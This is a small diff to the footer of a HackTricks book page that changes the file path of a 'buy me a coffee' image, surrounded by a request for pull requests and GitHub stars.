@@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. -![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%283%29.png) +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*